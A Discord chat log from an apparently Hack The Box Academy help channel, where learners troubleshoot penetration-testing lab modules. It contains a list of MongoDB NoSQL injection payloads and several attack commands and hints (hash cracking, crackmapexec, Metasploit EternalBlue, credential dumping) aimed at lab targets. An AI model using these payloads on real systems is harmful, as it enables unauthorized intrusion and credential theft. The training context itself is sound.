#modules

I liked the THM network boxes.

If you still need help, then write me a DM

But it's when you have to try really hard that what you've learned sticks in your head.

I don't like it because the website's layout is a mess and a huge number of the rooms are just copying and pasting commands.

In your opinion, which texts are not professional?

@acoustic owl It probably depends on the definition of professional being used.

What? Htb modules are written way too professionally lol dunno what ur on abt.

THM rooms are more casual and treat you on a childish tone.

The problem w htb is assumption of prior knowledge, or the capability to self-research.

THM assumes you know absolutely nothing.

Thm is also mostly copy pasting commands which ig is good for memorization but doesn't help actual application.

I thought the learning process module was pretty bad lol.

Forgot which one the learning process one is, is it the one that lectures you on mindset and philosophy or smthn.

Yeah. It's full of dubious nonsense.

Sure, criticism is good too. Only I think, you should then write what disturbs. Only in this way can the author really improve.

I think that isn't a problem as much as the fact that modules sort of jump everywhere.

The linux fundamentals module covers way too much, with each section covering way too little.

At least the windows fundamentals module states what an ip address and port are.

Again, htb modules assume prior knowledge or the ability to research.

I don't think it's wrong, but I think that sort of stuff does not belong in a fundamentals module.

You're asked to give an inode number, but it's never really stated what exactly an inode is.

It talks about soft links, and could easily make a comparison to shortcuts in windows

and completely neglects hard links

It then brushes through apparmor and selinux, and iirc it also jumps around with the old service name restart and systemctl name restart syntax

I agree w everything (especially since I attempted buffer overflow and got so lost) but all this goes under the #858470491676737536 channel

Here is mostly for like helping people w modules so like....

Is anyone here good with nosql injection for mongodb?

Ask the question.

https://github.com/Charlie-belmer/nosqli

Write a script for it.

You can just make a hack for it using bash. It'll be easier that way.

Well, not bash. You can use python.

Are you doing the SQL injections fundamentals course?

I passed that one. I'm doing Introduction to NoSQL Injection now

Aaaa ok

Some people are not the best at using google and i feel the module kind of teaches one to do research with google

This just shows a fundamental misunderstanding of the field. You're not going to have everything spoon-fed for you in pentesting.

Then the problem is your expectations. You're being taught a set of skills - not being given a set of bullet points.

This isn't a subject that you can just be given the answer all the time. You will often come across situations that don't fit in the box, and you need to think outside.

With your current attitude, you're going to get a pretty strong reality check, if you want to keep going forward with pentesting. There's just no universal way to teach you the skills you need for this - you have to be open to self-research, and to know what to search.

The same thing applies to the medical field. Doctors have to cram an absolutely insane amount of material, but the end goal isn't that you memorize everything - it's tthat you know how to get the information you need, when you need it.

You are being taught well.

You just don't seem to like what you are being taught.

I mean, you're 4 modules in to a course with 28 modules. You have barely even scratched the surface.

So you're doing the modules out of order?

... what?

Sometimes I think people complain too much because it wasnt handed to them on a silver platter and some other times people blame not being able to instantly succeed as a failing of the material.

The problem is that you don't know what a high standard is here. This is a high standard.

You have expectations, which do not align with the industry.

yup

atm I think it is

the only stuff Ive seen be better has been very niche advanced content

It has room for improvement, but not in the ways you are saying.

I see a lot of people coming here with no foundation knowledge and then complaining about not understanding things.
Maybe the expectation here is to learn everything from scratch.

Exactly

Thats a terrible expectation to have

thats not what htb is for or designed to do

full stop

I didnt do fundementals so I dont know their particular quality level

Shoult it teach you how to plug a keyboard in? How to touch type? There's a limit to what 'fundamentals' means.

what

Please show me the marketing that misled you.

also the fundementals are free modules

didnt you say earlier your complaint was about paying for content?

you said this

Keep it with the modules in this channel please.

I don't think its perfect either. I agree though that frequently I see your suggestions just amount to more handholding

we are literally discussing modules right now

I thought this was talking about help for modules instead of personal opinions which are endless.

I fundementally disagree with that

I think a lesson should always include area for exploration to understand the concepts

He... doesn't mean the module...

Things get a little more open ended when its late and theres little to no people actively asking for help

Ah for me its early, its 8:45AM here 🙂

This server is always absolutely dead at this hour.

late/early same thing. Most of the htb population isnt up and grinding content right now

so things get loosey goosey

long as its relatively academy related

I don't even think it's really off topic.

I agree, but its a bit diff if there was swarm of people trying to ask for help and they got drowned out by a debate

exactly 🙂

help is channel priority #1, but when thats not needed debate is fine

https://www.hackthebox.com/about-us

or at least it is if nobody snitches

Greece 99
UK 17
US 38
World 34

HTB is everywhere and not limited to Europe

HQ is greece iirc

thats definitely off topic

Module: ATTACKING WEB APPLICATIONS WITH FFUF --> i dont get to see any status codes. Whenever i use ffuf on THM for example, it does work like it should. On HTB not.

You're going to have to provide an example.

Have this problem since the beginning of the module (2 months ago). Ffuf does not seem to work properly on HTB for me, it does on my own parrot machine and other places similair to HTB

on my way with it

gunna need to show your command and output

https://imgtr.ee/image/wPm1H ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.hackthebox.eu/

all the commands from the module

For some reason, the password didn't work for me but the hash did.

your terminal is too small

expand it

common go bin term output issue

Did the job, full screen only to see the status codes. Thanks

👍

Try putting a known subdomain into a single word wordlist and figure out why it's breaking

I do not have permissions to write files with my SQLi to /var/www or /usr/share

But according to the web configuration file at ||/etc/apache2/apache2.conf|| i should be able to (This file is shown in the picture)

Omah I made a dumb mistake, nvm

This is a comment and only shows where the Webroot is usually located.

The default path is /var/www/html

I found out the hard way (1 day of dying lol)

Google is very powerful for this kind of thing. 😉

Doesn't work all types of scans. Trying to finish the module with GoBuster because i dont like working with ffuf 😦

that was the issue with the screenshot you shared. Further issues would be different problems

I like both gobuster and ffuf

gobuster is nice when I want something quick and simple. Ffuf when I need power.

Agree lol

Maybe thats the case, i didnt do things that required alot of power 🙂 I'm just a rookie!

Since the beginning i have trouble with ffuf and the results showing (or rather not showing) the proper way. Dont want to waste any more time on it and finish it. For now i dont need that " power".

But in the future you will, knowing more tools will come in handy

Did you try -mc all?

Sorry i dont understand what you mean with that.

There are http response code options with ffuf

I am aware of that, those are mostly missing in my output/results

why isnt there a possibility to pay for hackthebox with paypal?

I dont have a creditcard

very frustating 😦

Had that too! Indeed frustrating

Hello, anyone did the Linux Privilege Escalation - Linux Services & Internals Enumeration? I think the question is bugged.

does anyone have a tip on content : (Interacting with Users) module :WINDOWS PRIVILEGE ESCALATION

stuck here so bad

i added Malicious SCF File in C:/

but only hash am getting is the hash of my own user lol

See if there are any other directories where a user might be able to access them.

u mean in the users or over all ?

Over all

Python Version?

yep

Have a look at the installation directory

Hi all

Please, Can you help me on :Password Attacks Lab - Medium

I get the doc zip, but i can't use it

I had trying john with mut_password.list hash

But i had this message:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)

I had alos: Dy! password, but dosn't work.

that's the correct approach. since the hash was loaded correctly I would assume your mut_password.list is broken

@acoustic owl check ur dm please

Hi, can u help me pls solve problem with tuneling
Module: AD Enumeration & Attacks - Skills Assessment Part I
Trying to use chisel + cme/xfreerdp as in this forum post https://forum.hackthebox.com/t/ad-enumeration-attacks-skills-assessment-part-i/259237/22
stuck on receiving timeout error
||proxychains4 cme smb 172.16.6.50 -u svc_sql -p lucky7||

Strict chain  ...  127.0.0.1:1080  ...  127.0.0.1:1080 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  127.0.0.1:1080 <--socket error or timeout

hey everyone

AD Enumeration & Attacks - Skills Assessment Part II

Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

how can i upload a mimikatz on the machine

that's not what you're looking for in this case

dm you

hi guys any mod arround to give me a hand with #bot-coomands

im trying to identify and the bot is being mean

for the session security skill assesment I have the auth session cookie for the admin but im stcuk trying to figure out how to use it to login to admin account

like i swap the auth session cookie and just nothing happens

I figure out how to finish the burp suit exercise, the problem was that even tho i put a "200 OK" it wasnt appearing there, so all the requests with 404 made me lost the 200 in the wordlist

Does |\ seperate # and ; in this context and filter out both of those?

u can dm me, i may be able to help

but make sure the cookie you are getting is after u have sent the link to the /submit-solution endpoint

Since it's inside the double quotes probably you don't need to escape the ";", as alternative you could do:
grep -v -e "#" -e ";"

Aa oke

It means you all ready decode the password

Before

i figured it out, i fcking named the script .txt instad of .php like an idiot and it make the session a different token

( First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.) can you help me for this question when i try to update the name of an city to flag i have this . []

I have an issue with fuff, and ive had this issue eveyrtime i use it. Whenever I run it it says every parameter in the list I use is a valid result but Ik thats not right, has anyone else had this issue?

like everytime ive ever had to use fuff its just like this

Am I seeing wrong? - https://academy.hackthebox.com/module/112/section/1067

query user 0x3e9 and it talks about cry0l1t3 xd

Hey all. I am in "Kerberoasting - from Linux" in Active Directory Enumeration & Attacks. I am on the question "Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer". I am using hashcat: hashcat -m 13100 hash.txt rockyou.txt --force and I get that the Status is "Exhausted". I added the passwords we already found to the rockyou list also. Any guidance?

Aaa nvm i was seeing wrong

Submit a baseline request that has not been modified with valid parameters that will be processed successfully by the application and take note of the response. Then try submit invalid sequences of characters and logic in order to generate a database or application logic error to return to the client.

@barren escarp I haven’t completed this module yet, but MongoDB often faces attacks targeting its $where operator. Or parameter injection like https://example.tld?login?user[$ne]=1, u can attempt various attack strings, including JavaScript function insertion, JSON insertion ({}), and try fuzzing with different attack strings some attack strings to consider are

•    true, $where: '1 == 1'
•    $where: '1 == 1'
•    ', $where: '1 == 1'
•    1, $where: '1 == 1'
•    { $ne: 1 }
•    ', $or: [ {}, { 'a':'a' } ], $comment:'successful MongoDB injection'
•    db.injection.insert({success:1});
•    db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
•    || 1==1
•    ' && this.password.match(/.*/)//+%00
•    ' && this.passwordzz.match(/.*/)//+%00
•    '%20%26%26%20this.password.match(/.*/)//+%00
•    '%20%26%26%20this.passwordzz.match(/.*/)//+%00
•    {$gt: ''}
•    [$ne]=1

Why are you filtering the response size of 2287?

In your case I’d be using the -fs 2309 switch because you want to find the response size that deviates from the norm

Why dosent this work? Am I submitting the right SMB banner?

probably cause it's wrong

:I

Lol

Reload the page and make sure there are no spaces at the beginning or end of the string.

I reloaded it

Tried the same, made sure there were zero spaces

didnt work

Footprinting - SMB

do a manual banner grabbing or use nmap

Manual via netcat?

can work, otherwise use nmap

Try running sudo nmap 10.129.X.X -sV -sC -p139,445

Aaa

So its the version

Not the banner?

The service scan solved it

But I dont get why, is SMB and Samba the same

wait

Lol

asking the question i realised

you were looking probably at the outpout of smbclient

yes

But why is the output different?

go ahead and you will find it out

Why do I get the SMB share version using smbclient but using service version i get the samba version

Samba is the open-source implementation of that protocol used by non-Windows systems to interact with Windows-based file sharing and networking services.

But if i check the sambashare i get the SMB version, is it the version of that specific share?

The question is a bit cryptic but it’s asking you what version of SMB server is running on the target system - not asking about the version of the share

Can shares be run different versions of SMB?

Compared to the server

I was an idiot and just overlooked the 1 that size was different cause I’m blind

Yes, they are heterogeneous. You are getting confused because the question is saying to submit the full banner but by full banner they mean basically include the word samba with its version number

Yeah looked like you were filtering the one size that you needed 😉

hello everyone, i really need help, i am in the chisel section in the PIVOTING, TUNNELING, AND PORT FORWARDING module, and when i want to start chisel in the pivot host (ubuntu) it tells me that:

./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)

The ubuntu is not connecting to internet so, what can i do ? pls

just get a pre-compiled version

https://github.com/jpillora/chisel/releases/tag/v1.8.1

ok thank you i'll test that

Can a SMB server have another SMB share runned on it?

how can i download it ?

As I can see it is built like Samba SMBD is the main server and ||InFreight SMB 3.1|| is a file share on that SMBD server

Yes, you can set up multiple shares. Don’t overthink it. Stick to the methodology. You have an IP address and you want to find what ports are open, then what services are running on those ports. Then you want to find the version of those services. Then you interact with those services.

Yes but it has a file share named ||InFreight SMB v3.1||

scroll down the page, and select whatever version you need, either linux or winodws

ty

So therefore I am thinking, can I host a SMB file share on a samba server

Yes, but the question is not asking you to submit the name of the file share?

then use: gunzip -d <YOURFILE>

Nono, I got the answer

I am just asking as a general question

and don't forget to chmod +x <YOURFILE>

Ahahah ok i'll do not ty

Yes, It allows non-Windows operating systems such as Linux, Unix and macOS, to communicate and share files with Windows systems using the SMB/CIFS protocol. Samba provides file and print services that are compatible with Windows-based clients

aaaa

so its like

a samba server with smb running on it

nvm it says the SMB share has a customized version

So I think they did that to confuse me

Please, I'm stuck in password attack labs,
I had the both user name J & D,
can someone give me a hint?

Examine the second target and submit the contents of flag.txt in /root/ as the answer.
https://academy.hackthebox.com/module/147/section/1335

This is is killing me - I’ve been trying to crack the hash from Attacking Common Services - Attacking SQL Databases. Nothing seems to work…Also, I get different hashes depending if I use Responder or Impacket-smbServer. Any help much appreciated 🙏!

You do a bit of moving around from one user to the next, root isn't always achieved from one user

what account are you trying to crack

If using hashcat make sure you're using the right -m

Thanks for such quick reply! Account is mssqlsvc.

Have you already tried everything from the section?

Thanks you response 🙂. I have used pretty much every single one for hashcat 😂. After using hashid I’ve mostly been using 1000

Well if you're using the wrong hash mode you're not gonna get an answer loll

1000 seems correct though

What wordlist(s) have you tried?

can you give me more details please

Ah…don’t suppose you could give me a nudge on which one I should use instead? I think I went through the entire list here —> https://hashcat.net/wiki/doku.php?id=example_hashes

The one from the resources folder, fastrack, rock you and on e from the passwords folder in Seclists

You start from user 1, then go to user 2 after finding their credentials. Something about abstract thinking on why a certain file would be password protected

What is the command you are running

||hashcat-m 1000 - a 0 hash file.txt wordlist.txt ||

Is hash file in your filesystem with a space?

No, sorry, spellcheck decided to add that. Just put in pseudo names for file names. I’m using txt file for the hash.

Does hashcat tell you it's exhausted?

Yeah, constantly 😂

Anybody can help me with the question from WEB REQUESTS module, is the part of CRUD API. The question is the following: First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.

I've sent the correct request to update the city using London, and I confirmed the exitence of the "flag" city with another curl command, but after deleting london the request to flag has the same info I sent with the PUT request.

AHHH

im fianlly on the last part of the file inclusion skill assesment

i can literally see the flag.txt file but cating isnt working

i am losing my mind

nvm im an idiot i just had to vent

i thought the flag would be standard HTB[] format but it was a random string

Use rockyou and john.

Thanks, but tried that and I got this error —> Unknown ciphertext format name requested. I can only think that my hash is incorrect at this stage?

Whats the md5sum of your hash
md5sum file

Note it worked with john without needing to change or alter anything to the file

OK figured it out for hashcat; it's ntlmv2, so 5600 not 1000

For the raw hash you should get

If you don't have the full hash it will not spit the answer out

is there any social engineering machine or module

You my friend, are a MASSIVE legend!! Thanks so much 🔥😎

It took me a bit of troubleshooting myself to figure it out

😆

Then I did ctrl-f on the page and was like "ohhh multiple ntlm types"

how do i remove lightspeed from my windows 11 laptop

Google it

This is wholly unrelated to academy modules

Looks like it's an mobile device management tool for schools

¯_(ツ)_/¯

New to the I.T. world. Was wondering if anyone knew which module would be a good start for me to learn some fundamentals that lead towards an A+ cert and then to CCNA cert

Professormesser

Any of the fundamentals modules really. A+ is fairly basic

Linux Fundamentals

I studied for the A+ then I went into the fundamentals path, I feel it would be a bit brutal without the A+ knowledge (I didnt take the test lmao)

Linux isn't gonna be on A+

Lol

Also ccna covers networking, security and like a few other things

Have you watched the networkchuck CCNA course(the free one)?

No

Ah, i really liked that one

wait, this is off topic

nvm

no but I have seen it pop up. I just noticed that when I am in school for some of my networking classes that I don't have a clear understanding on networking and the terminology so I feel like I am lost when listening to people talk about numerous topics in cybersecurity. If it's broken down barney style then I'll be able to get it down

hey could you help me for Oracle TNS?
i logged in with the scott/tiger but i can not find the password hash for the DBSNMP user. any help?
select password from all_users where username = 'DBSNMP';
will not return password hash.

hello i just joined the server so wtf is happening

nothing

wait i think a joined the wrong server my bad

Could anybady explane why i have mistake: "exploit completed, but no session was created.", ehen I use "msf > use exploit/windows/smb/ms17_010_psexec" ? Thanks for you help.

Just saw your message. Did u fix it already?

Yes.

Because something could have been incorrect in your exploit settings

i have used defoult settings, what was in MSF at the HTB virtual machine

Execise link?

https://academy.hackthebox.com/module/39/section/404

You could try using a regular reverse shell instead of a meterpreter one, sometimes that works for me

hey guys, im stuck at common services attacking - sql part. trying to log in htbdbuser user with no succes from mysql, getting error tmyj-7i2o

anyone who dealt with it before?

Whats the command you're using?

mysql -u htbdbuser -p 'MSSQLAccess01!' -h

I dont remember that section but Id be shocked if a mysql db had MSSQL as part of the password

well that's the password written on the authentication

yeah but are you positive its mysql?

Try impacket-mssqlclient

mssql and mysql are different sql services

^ this

i need help ha(kers

The point being: the password even tells you mssql

Like its not technically impossible for it to be that way. itd just be a dick move by HTB

Inb4 it's completely unrelated to the channel

and I dont remember such a dick move

That sounds more like something that would be on a box

well got it guys lol

and I remember most of the dick moves

thanks

np

ayo

Ask your question

are you hacker?

Ask your actual question here

You knob

private dm

this channel is for academy module discussion only

read #rules and #welcome

hushhh

You can feck off then

:)

If you don't have the balls to ask your question publicly and be potentially directed to the right resources. Then I'm not helping privately

they yall gonna report meh

Then that is all I need to know

You can feck off now

fine shawty

He doesn't know

Ill do it anyways

<@&861185840277487616> person is spamming module offtopic stuff with trying to DM people about server breaking rule stuff.

okiiiiiiiiiiiiii

feck off

not helping your case 🙂

i need hikers friends 😦

This is clearly the worst possible way to do so

I like to hike

ha(ker

its not a curse word

you can say hacker

Ha*ker

any help?

i tried. but only shows me the users

i could not find the syntax. if you know then, tell me

I had some progress, when i used "set PAYLOAD payload/windows/x64/meterpreter/bind_tcp" . I connected. But i can`t find file "flag" or dir "Desktop". Operation failed: The system cannot find the file specified.

se the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer. It is the goal

why are you trying hydra against a ssh server that doesnt support password auth?

and the second one the error says it doesnt support smbv1, so youll have to target smbv2 or smbv3 n such

:/
its oracle

i know the sql syntax 😐

I dunno

if hydra doesnt support it try something else

that was a bug for the module
didnt show me the sys.user$ data

guys i messed up a little with impacket-mssql, trying to locate the user and know how to use sql language but not mssql much

Yes, and it’s generally a bad thing to do so a lot of people will turn that off

Yup, doesnt necessarily mean guest has access to anything useful, but worth checking

hey guys, I am working on the attacking drupal in attacking common applications, and when I try to upload the downloaded php filter file the webpage claims the php filter is already installed but then when I go to make a basic page, the page does not have the option for me to make it a php filter. Am i doing something wrong?

You did though

SHAREDRIVE is not a default share

smbclient is just giving you some errors about smbv1 which you already knew was disabled anyways

What prompt

Cause you have the listing command

and didnt specify a share to access

review your notes on smbclient

the nmap module was surprisingly tough for me to finish so I ordered the Official Nmap Project Guide by Gordon Lyon

hopefully it will make as good study material for the CPTS

thanks @west canopy !

hi everyone i need some help, idk how can i transfer socksoverRDP binary from my linux to the pivot in the PIVOTING, TUNNELING, AND PORT FORWARDING module, idea ?

i have tested wget with a pthon server in my linux but does'nt work

what kind of access do you have to the pivot host?

local admin

no I mean like RDP/SSH

ahh rdp

it's a windows victim

if you are using xfreerdp you can specify a drive (directory) that you can mount

good idea

hello everyone

im stuck on the last question on the AD Assement part 2, my brain just blocked so if u have any hints on how to get the KRBTGT hash please let me know

I'm not sure how to hint this without straight up giving away he method. let's say there is a method for stealing all hashes there are, which would include KRBTGT

I would be concerned if you got all the way to the end of the module and didn't know how to do that

eh if you've been staring at it for a couple of hours your brain is gonna melt at some point

I believe it's supposed to be you finding some kind of documentation file and simply grabbing credentials from it, regardless of what it actually documents

ty all it's been infront of me the whole timem

the service you're looking for is on page 2

anyone available for a hint for Linux PrivEsc / escaping restricted shells?
https://academy.hackthebox.com/module/51/section/1845

I've tried a bunch of stuff but I have no clue how I could escape this

You'll need to try additional techniques not covered in the module

I figured. any useful resources on this?

https://0xffsec.com/handbook/shells/restricted-shells/

alright, I'll read through it. thanks 🙂

got it. thank you very much 😄

I have a question on the Broken Authentication Module. In the Default Credentials section https://academy.hackthebox.com/module/80/section/772 The question is "Inspect the login page and perform a bruteforce attack. What is the valid username?". I already solved it by looking at the HTB forums and doing some digging etc. My question is, is there a logical way to determine the list of default passwords needed for this? Nothing in the section, none of the links etc, lead me to the answer. I see looking at the source code that I get the hint HMI/Scada but the company and answer are not on any of the github repos etc that are listed in the section. It seems like I am either missing something or this is a serious fishing expedition to guess the answer. I appreciate any feedback on this! Thank you.

The contents of the target webpage should give you hints for specific lists of default creds to look for

Saying anymore would be a bit too much of a hint

Ok maybe my google foo was off the first time, I just tried it again and duckduckgo gave me results for the first hit. I guess I was reading too much into the links etc provided in the module. Thanks!

It be like that sometimes

madf0x has been saying this, but if what you’re doing deviates from what the modules say, but you’re still getting to the same place, that’s good!

Experimenting and messing with things is key. Sometimes the module’s text just gives you the answer, other times there’s just a much better way to do things.

There are other times where its deliberately designed that way too

Ever wonder why AD is after pivoting? Or file inclusion after ffuf?

😉

for sure, I get they want us to think outside the box! I get that tunnel vision somethimes...

There are elements in those modules that wont be stated you should do at all, but are 10x easier if you apply lessons from earlier modules without being told to do so

Hey! Would it be possible to get a nudge for the Documentation & Reporting Practice Lab in the documentation & reporting module? The one where you have to get domain admin by completing an in-progress pentest?

gotta admit, i suck at AD lmao

What part are you stuck on?

you can get DA in 5 minutes of starting the lab

well, thats good to know because thats the part im stuck on

what am i missing?

ignore the in progress report, do what youd normally upon first landing on an AD network

I'd fire up responder and see if I could get any hashes. Doing that i get a bunch of hashes from a bunch of accounts. I'm assuming the password for the Domain Admin is behind one of these?

¯_(ツ)_/¯

Find out

Why ask when you can try

cool, thanks!

I want to learn from some expert player.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@cyan cosmos ^

hi

I mean theres plenty of juicy looking stuff there to start investigating

Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED>         (?)     
1g 0:00:00:03 DONE

also spoiler

ah lol I never use john

I thought that means that it was cracked not that it was the password lol

I think you also have to add the format with --show for it to to reveal it properly that way, but idr

me too but I couldn't find the ID for sha512

https://hashcat.net/wiki/doku.php?id=example_hashes

I know but no of them work

Thanks @rustic sage

lmao it looks like Moo32 snitched on himself if not for time difference

Help pls have been stuck on this for days, AD Skill_2: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

I have the CT***** user and i know this user could changes some information for high privilege users, and finishes everything

I have been trying to do so , with no results what so ever, any help is well appreciated

https://academy.hackthebox.com/module/143/section/1279

its a skill assessment so what help can be offered is limited

but you already have a key user, and know it has privileges that can be leveraged

review the section notes about how to leverage those privileges

I really did review the section notes, it doesn't seems to be working and don't know why

I can dm if possible

Im headed to bed unfortunately

CVE for Instagram

ahahahaha

Your account is even verified

you should no this isnt the channel let alone server for this

i just want to know for some ethical testing

ive checked exploit db

but nothing

you cant be real

gotta be a troll

<@&861185840277487616>

i asked for ethical reasons

how is it rule break

its completely off topic, and theres no ethical reason for asking for a CVE for a public website

any variant of 'how to hack Instagram' is going to be a rule 4 violation

Bro thinks he can gaslight us like chat gpt

i just wanted to know how instagram had been hacked in the past

for educational purposes

You can search on bb sites for disclosed Instagram bb reports.

But this is the wrong channel, you're asking the most off topic thing there is.

Hello does someone has any material about becoming proficient with Linux and windows shell command line ? Thanks

ok my bad soz

For Linux, setup a vm and get used to using it.

Linux journey helps too.

https://linuxjourney.com/

Thanks

SOLVED!!

https://academy.hackthebox.com/achievement/badge/c424b591-1d57-11ee-acfc-bea50ffe6cb4

Did you get this to work? Once again the instructions in the module are way too simplified...

Indeed, I just over complicated the instructions in the module

But how did you manage to ssh to that address since it's giving the error for wrong password

actually you can't ssh, only RDP is possible

i didn't try chisel {proxychains} though, i just wanted to finish the section

Even with RDP i can't get the secretsdump to work..

dm me

does anyone solved the updated AD assessment level 1?

Hi! I need a hint for the windows escalation path. I am trying to resolve the finals skils (part I), but i am very frustrated. I cant upload any files in the victim machine. I tried a lot of ways. I can stablish connection with metasploit and manually with a reverse shell. Can someone give me a hint for the best way to escalate privileges? Thanks a lot

I have tried in metasploit with the upload function and in the reverse shell with modules to download files through powershell from my attack machine, but everything gives me an error

I was inspired to ask, I just got it jajajajaj

Hi

27 modules left until i become a hacker

who can help me?https://academy.hackthebox.com/module/147/section/1335

What exactly do you need help with?

Then you take the exam?

well yeah he's required to XD

do i need the exam

i just wanna be a hacker

....legally...right?

yh ofc

legal

dmca and all that

he doesn't sound sincere

bring the lie detector

You understand that
or 1=1

Congratulations, you are a hacker 🥳

well if you're doing bug bounties, you don't need the exam.

They don't require certifications to take part in those.

But if you want to get a job, then it's a different story.

I got a person's smb credentials through crackmapexec in the medium lab, I got a Docs.zip file after connecting through smbclient, I also cracked it, but it was a docx document, I opened it with garbled code, so what should I do now

if i learn all of cpts i should have all the knowledge of a hacker right

i cant start working for another 2yrs unfortunately

No, then you have learned the basics.
Okay, advanced basics, but in this field you will never be done learning.
Check out the Academy to see how many modules there are outside of the CPTS pathway.

way to many

how many have u done

I have soon completed this module

bug bounties won't require the whole CPTS route, it's mainly just web bugs.

can u hack people now

ethically

and legally

No, I can't hack people. How could I? A brain doesn't have a USB interface or anything.... 😉

come on u know what i mean

I don't want to hack anyone's accounts at all. If I do, I want to help a company find vulnerabilities in their servers.

you can only hack someone if they consent or ask you to do so, or else it's illegal.

Doesn't take a genius to know all this.

classic alex

yes but sometimes people ask for penetration test on them right

no...?

to test for vulnerabilities

you don't penetration test someone wtf?

Only companies do that

Aside from being off topic, can we not humor him? He's asked nothing but inappropriate questions since he's joined.

Maybe if a person wants to know how much info you can get on them, or if you can get into their accounts, but that's just very very unlikely.

@proud pine first time reading him?

oh

srry i just didnt know

im new to all of this

hard to tell if somebody is trolling or genuinely oblivious nowadays

If you attack someone's account, even if they ask you to, you must always get permission from the server operator as well.
The server operator must agree to a pentest

ok

familiarise yourself with the #rules @valid cipher

i can never get why somebody wants to hack another person.

if it's easy for somebody as oblivious as you to do it, you should be worried for yourself.

@rare topaz except htb machines

Let's stick to the channel topic otherwise, either take it to #general or DM's. thank you

who can help me this modulehttps://academy.hackthebox.com/module/147/section/1335

DM

🤔

Nö

maxi._09 (733343360261161021) has been banned until 2133-05-02 12:00:54 (UTC). Could not DM banned member due to permission error.

Thanks 🙂

Anytime! 🙂

Has anybody completed 80/80 of the modules?

If anyone is at least close to it that would be PayloadBunny but I think he isn't quite done either

help me:https://academy.hackthebox.com/module/147/section/1335

Wdym lol

Oof

what your mean?

What is the question you want help with? What is the issue you are having?

What did you try to get the flag mind sharing your process and at what point are you stuck?

Now I've reached the critical stage. I'm logged in to jason's server, but I don't know what I'm going to do to get into Dennis's server and read flag

Slow and steady

Now I've reached the critical stage. I'm logged in to jason's server, but I don't know what I'm going to do to get into Dennis's server and read flag

Do some more enumeration on the server. Jason can get dennis' password

I've enumerated jason's services, but I don't know what to use next. What should I do

What services does he have access to?

mysql？

thanks @west canopy

in Web Server Pivoting with Rpivot the flag I got from the webserver isnt working, for the question: Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer. Can somebody help me with it please?

ah sorry for not responding. yes, that seems interesting

I connected to MySQL, got Dennis's password, and now I'm logged in to Dennis, but then I'm running out of ideas

is this password attacks medium?

Stuck on pivoting skills assessment and would appreciate some help with the final hop. I have access as ||mlefay|| to the first internal network host ||172.16.5.35|| and also got what I'm pretty certain are ||vfrank credentials (cleartext and NTLM hash) with sekurlsa::logonpasswords on .5.35||. I ran powershell one-liner to ping hosts in the ||.6.0/24 subnet|| and have come up completely empty handed. I'm also running the command in a cmd prompt running as administrator. Any nudge would be appreciated.

yes

Nice, I am right behind you 🙂

You can dm me.

looks behind themselves frighteningly

I can help you out with this, you just need to find live hosts in the subnet.

Dm me.

umm you should find hosts in that subnet. I suspect you need to increase the timeout as connection in the internal network is very slow

ahh okay I'll try that

[-] Kerberos SessionError: KRB_AP_ERR_BADMATCH(Ticket and authenticator don't match)

for the 'Introduction to windows command line" module , everytime I ssh into the machine why does it automatically take me to the Powershell prompt but not the command prompt? How do I get to the command prompt?

Can’t you just type cmd in PowerShell to get to the command prompt?

Hi friends, I am stuck in Footprinting Lab-Easy. I have connected into the sftp server and have found the flag.txt. I am having trouble reading it. I cant cat it. it says invalid command. Can I get a hint please?

simply write "cmd"

Hi

FTP is used for file transfers

Transfer the file to your local machine

You cd to the flag directory, then you can cat flag.txt

Your logged in as ceil right?

yes I did. Looking up where is the file I trx.

Use ls -la

Thank you so much for prompt support!

Will mess with it!

I know I am very close

Use cd .. to move to the parent directory.
Type ls -la to see a detailed listing of everything, including hidden items.
Use cd flag to navigate into the “flag” directory.
Enter cat flag.txt to view the content of the “flag.txt” file.

I am trying to look for a host with the FQDN that ends with x.x.x.203

I cant find it

you may need to code a script for this to loop through what you already have and find more subdomains

I tried doing it manually, but didnt find anything

module has provided you two I think

Yes

first try is going to be easy:
try zone transfer on all websites/zones you hvae found

then move on to more time-consuming steps such as bruteforce

ayayay ok

Same, I can't figure out the htbuser password, I also found the 5 possible passwords, but none work.

DM me

I need a hint for linux PrivEsc logrotate. I'm unable to figure out which log is being rotated. pspy told me that there is a cronjob running that rotates it but I can't figure out which one. is there a way to figure it out or do you have to just try everything you stumble upon?

Try appending data to some interesting looking log files. The one that gets removed shortly after is the target one.

I had the same issue first. It turned out I didn't try all combinations

Normally the rotation would take longer but they set it up to go every 5 seconds iirc

yeah I've seen that. aight lemme try

hi everyone, i'm a little bit stuck at the 3 last questions of the port tunneling, forwarding... skill assessment, i found the user vfrank but idk how can i get his password ? can someone help me pls ?

I tried adding a timeout in windows CMD (no timeout option I'm aware of for powershell) and the whole loop completes in a second... 😅

let 100, you have to start it mutiple time for it to work

okay I found the log and logrotten is saying that it rotated and that my payload has been copied over. I'm not getting a reverse shell though :/

worked well with 200 for me

None of these have the IP, i tried bruteforcing the other subdomains and I got nothing

Trying it out now

guys im banging my head against the desk for the last few hours with something non htb related is it allright if i ask here its a linux thing im trying to do for some extra practice

Use the smallest list. If you don't find anything, use the next larger list. 5000 entries are too many

got it 🙂

I found the vfrank hash but i can't crack it, is it normal ?

That's which module/section?

So it stops after 5000?

I tried with 11000

And found nothing lmao

No, but all lists with 5000 and more entries do not contain the searched host 😉

WHa

Look at the hint

finally found some new hosts!!

thanks! @heady tusk @whole grotto

Awesome 🙂

So, I should use a different wordlist

ok i found his hash but should i have to crack it, because i tried with rockyou and i found nothing

hey everyone , I am new cyber security

sup

whats the hash in?

